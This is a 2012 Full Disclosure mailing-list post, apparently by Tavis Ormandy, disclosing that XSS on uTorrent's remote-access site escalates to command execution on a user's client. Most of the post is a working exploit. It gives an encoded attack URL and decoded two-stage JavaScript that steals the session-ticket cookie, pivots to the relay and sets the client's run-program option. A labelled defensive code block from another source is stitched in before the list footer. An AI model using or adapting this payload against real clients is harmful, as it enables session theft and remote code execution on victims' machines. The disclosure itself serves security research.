Full Disclosure mailing list archives

Re: Transmission BitTorrent XSS Vulnerability


From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Sat, 28 Jul 2012 19:36:39 +0200

Tavis Ormandy <taviso () cmpxchg8b com> wrote:

> Justin Klein Keane <justin () madirish net> wrote:
>
> > Impact
> > ------
> > Clients loading a maliciously crafted .torrent file into
> > Transmission and viewing the web client could be subject to arbitrary
> > script injection, allowing an attacker to run arbitrary code in the
> > context of the victim's web browser.  This could lead to privacy
> > compromises (such as if the script "phoned home" to another URL with
> > client information) or client-side attacks (such as drive-by downloads).
>
> I was just looking at a similar package for Windows called utorrent. They
> relay the remote administration through a third party, presumably to help
> non-technical users understand NAT traversal.
>
> Similar problems exist, but you can use it to set configuration options
> that result in command execution. I guess this problem is public as their
> contact address is a public bug tracking system (mea culpa).
>
> I have a working demo for command execution, email me off-list if you want
> it (I'm reluctant to send too much information about windows software to
> the list, as journalists tend to abuse it, email me if you need
> specifics).
>
> Tavis.


Too many requests; I've included details below. Don't get too excited, it's
not very interesting. I suppose it's worth documenting as another example of
XSS to native code execution, although it's more academic than a realistic
threat as nobody is likely to use this with an expectation of security.

The problem is that any XSS on remote.utorrent.com (or presumably if you're
a mitm with sslstrip) is equivalent to code execution if the "remote" option
has been enabled in the preferences dialog (assuming the user is logged in,
of course).

As with any non-trivial web application, these are not difficult to find,
even for non-web specialists like me. Once you have an XSS, exploitation is
relatively straightforward.

- Read the bt_talon_tkt cookie from remote.utorrent.com
- Resolve the ticket to a raptor using XHR to
  'https://remote.utorrent.com/talon/getinfo?bt_talon_tkt=' +
  encodeURIComponent(ticket);
- Exploit the same XSS on the raptor, allowing you to interact with the
  application.

The most obvious attack is to set the "state_cmd" option to whatever command
you require (I assume \\remotehost\whatever.exe will work via the webdav
redirector, but I didn't test it).

Here is the demo I sent to the vendor; I don't know if it works for all
cases:

https://remote.utorrent.com/send?btih=DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF&dn=ignored&message=';eval(unescape(document.location.hash.substring(1)));//#var%20ticket%3Bdocument.cookie.split%28%27%3B%27%29.forEach%28function%28cookie%29%7Bticket%3Dcookie.indexOf%28%27bt_talon_tkt%27%29%21%3D-1%3FencodeURIComponent%28cookie.split%28unescape%28%27%2522%27%29%29%5B1%5D%29%3Aticket%7D%29%3Bx%3Dnew%20XMLHttpRequest%28%29%3Bx.open%28%27GET%27%2C%27/talon/getinfo%3Fbt_talon_tkt%3D%27+ticket%2Cfalse%29%3Bx.send%28%29%3Braptor%3Deval%28%27%28%27%20+%20x.responseText%20+%20%27%29%27%29.raptor%3Bdocument.location%3Draptor.replace%28%27http%3A%27%2C%27https%3A%27%29.replace%28%279090%27%2C%279000%27%29+unescape%28%27/send%253Fbtih%253DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%2526dn%253Dignored%2526message%253D%2527%253Beval%2528unescape%2528document.location.hash.substring%25281%2529%2529%2529%253B//%2523f%25253Ddocument.createElement%252528%252527IFRAME%252527%252529%25253Bf.src%25253D%252527/talon/gui%25253Futorrent%25253D1%252527%25253Bdocument.body.appendChild%252528f%252529%25253BsetTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.uki%252528%252527%252523toolbar_preferences%252527%252529.trigger%252528%252527mousedown%252527%25252C%252520%25257Bwhich%252520%25253A%2525201%25257D%252529%252520%25257D%25252C%2525205000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.utWebUI.stpanes.show%252528%252527dlgSettings-RunProgram%252527%252529%252520%25257D%25252C%2525206000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.document.getElementById%252528%252527state_cmd%252527%252529.value%25253D%252527C%25253A%25255C%25255CWINDOWS%25255C%25255CSYSTEM32%25255C%25255CCALC.EXE%252527%252520%25257D%25252C%2525207000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.document.getElementById%252528%252527DLG_SETTINGS_SAVE%252527%252529.click%252528%252529%25253B%252520%25257D%25252C%2525208000%252529%25253B%27%29%3B

Wait a few seconds, then check the preferences pane of the client to see if
the new setting has been set.

The escaped text is the following inelegant code:

Stage 1 payload:

    // Stage 1 runs on remote.utorrent.com: read the bt_talon_tkt cookie,
    // resolve it to the raptor, then redirect to the raptor with the same
    // XSS and stage 2 carried in the URL fragment.
    var ticket;
    document.cookie.split(';').forEach(function (cookie) {
        ticket = cookie.indexOf('bt_talon_tkt') != -1
            ? encodeURIComponent(cookie.split(unescape('%22'))[1])  // the cookie value is double-quoted
            : ticket;
    });
    x = new XMLHttpRequest();
    x.open('GET', '/talon/getinfo?bt_talon_tkt=' + ticket, false);  // synchronous XHR
    x.send();
    raptor = eval('(' + x.responseText + ')').raptor;
    document.location = raptor.replace('http:', 'https:')
                              .replace('9090', '9000')
                              + unescape('/send%3Fbtih%3DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%26dn%3Dignored%26message%3D%27%3Beval%28unescape%28document.location.hash.substring%281%29%29%29%3B//%23f%253Ddocument.createElement%2528%2527IFRAME%2527%2529%253Bf.src%253D%2527/talon/gui%253Futorrent%253D1%2527%253Bdocument.body.appendChild%2528f%2529%253BsetTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.uki%2528%2527%2523toolbar_preferences%2527%2529.trigger%2528%2527mousedown%2527%252C%2520%257Bwhich%2520%253A%25201%257D%2529%2520%257D%252C%25205000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.utWebUI.stpanes.show%2528%2527dlgSettings-RunProgram%2527%2529%2520%257D%252C%25206000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527state_cmd%2527%2529.value%253D%2527C%253A%255C%255CWINDOWS%255C%255CSYSTEM32%255C%255CCALC.EXE%2527%2520%257D%252C%25207000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527DLG_SETTINGS_SAVE%2527%2529.click%2528%2529%253B%2520%257D%252C%25208000%2529%253B');

Stage 2 payload:

    // Stage 2 runs on the raptor: load the web GUI in an iframe, then drive
    // its UI on a timer: open preferences, switch to the Run Program pane,
    // set state_cmd, and save.
    f = document.createElement('IFRAME');
    f.src = '/talon/gui?utorrent=1';
    document.body.appendChild(f);
    setTimeout(function () {
        f.contentDocument.window.uki('#toolbar_preferences').trigger('mousedown', {which : 1});
    }, 5000);
    setTimeout(function () {
        f.contentDocument.window.utWebUI.stpanes.show('dlgSettings-RunProgram');
    }, 6000);
    setTimeout(function () {
        f.contentDocument.window.document.getElementById('state_cmd').value = 'C:\\WINDOWS\\SYSTEM32\\CALC.EXE';
    }, 7000);
    setTimeout(function () {
        f.contentDocument.window.document.getElementById('DLG_SETTINGS_SAVE').click();
    }, 8000);


I'm sure javascript programmers will cringe at my code, my apologies.

Tavis.

-- 
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------
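The injection point the demo URL above relies on, as an added example that is not part of the original post and not uTorrent's code: a `/send` page that reflects the `message` parameter into a JavaScript string literal inside an inline `<script>`, so the value `';eval(unescape(document.location.hash.substring(1)));//` closes the literal early and appends a statement that pulls the real payload out of the URL fragment. The template, the encoder, the `showMessage` hook and the fake browser environment below are constructed for this demonstration; the fix shown is context-aware encoding for a JS-string sink, not anything the vendor is known to have shipped.

```javascript
// Added example (not from the original post or from uTorrent): a minimal
// model of reflecting a query parameter into a JS string literal, beside a
// hardened rendering of the same template. Everything here is constructed.

// The value after message= in the demo URL from the post.
const XSS_PAYLOAD = "';eval(unescape(document.location.hash.substring(1)));//";
// A constructed second payload that targets the HTML parser instead of the
// JS string: closing the <script> element from inside the literal.
const SCRIPT_BREAKOUT = '</script><script>alert(1)</script>';

// Vulnerable rendering: raw interpolation into a single-quoted JS string.
function renderSendScriptVulnerable(message) {
  return "var message = '" + message + "';\nshowMessage(message);";
}

// Context-aware encoder for a value placed inside a JS string literal.
// JSON.stringify handles quotes, backslashes and control characters, but
// leaves <, >, &, U+2028 and U+2029 alone; those are escaped as \uXXXX so the
// HTML parser cannot see a </script> and the JS parser cannot see a line
// terminator inside the literal.
function encodeForJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, function (c) {
    return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

// Hardened rendering of the same template.
function renderSendScriptHardened(message) {
  return 'var message = ' + encodeForJsString(message) + ';\nshowMessage(message);';
}

// Wrap a script body in the surrounding document so the <script> element
// boundary can be inspected as well.
function renderSendPage(scriptBody) {
  return '<html><body><script>\n' + scriptBody + '\n</script></body></html>';
}

// Run a rendered script body with eval, document and showMessage replaced by
// instrumented fakes, so the effect of the injection is observable without
// executing anything taken from the fragment. Returns what reached
// showMessage and every string passed to eval.
function runScriptBody(scriptBody) {
  const evalCalls = [];
  let shown = null;
  const fakeDocument = { location: { hash: '#stage-two-would-be-here' } };
  const fakeEval = function (code) { evalCalls.push(code); };
  const fakeShow = function (m) { shown = m; };
  // A parameter named eval shadows the real one; this is legal because the
  // Function constructor produces sloppy-mode code.
  const fn = new Function('document', 'eval', 'showMessage', scriptBody);
  fn(fakeDocument, fakeEval, fakeShow);
  return { shown: shown, evalCalls: evalCalls };
}

function countOccurrences(haystack, needle) {
  return haystack.split(needle).length - 1;
}

// Side-by-side outcome for both renderings and both payloads.
function compare() {
  const vuln = runScriptBody(renderSendScriptVulnerable(XSS_PAYLOAD));
  const hard = runScriptBody(renderSendScriptHardened(XSS_PAYLOAD));
  return {
    vulnerableEvalReached: vuln.evalCalls.length > 0,   // true: the literal was closed
    hardenedEvalReached: hard.evalCalls.length > 0,     // false: payload stays a string
    hardenedMessageIntact: hard.shown === XSS_PAYLOAD,  // true: value survives unchanged
    vulnerableScriptTags: countOccurrences(
      renderSendPage(renderSendScriptVulnerable(SCRIPT_BREAKOUT)), '</script'),  // 3
    hardenedScriptTags: countOccurrences(
      renderSendPage(renderSendScriptHardened(SCRIPT_BREAKOUT)), '</script'),    // 1
  };
}
```

The point of the two payloads is that a JS-string sink has two parsers to satisfy: `JSON.stringify` alone stops the quote breakout but still lets `</script>` through to the HTML tokenizer, which is why the encoder also turns `<`, `>` and `&` into `\uXXXX` escapes.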

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
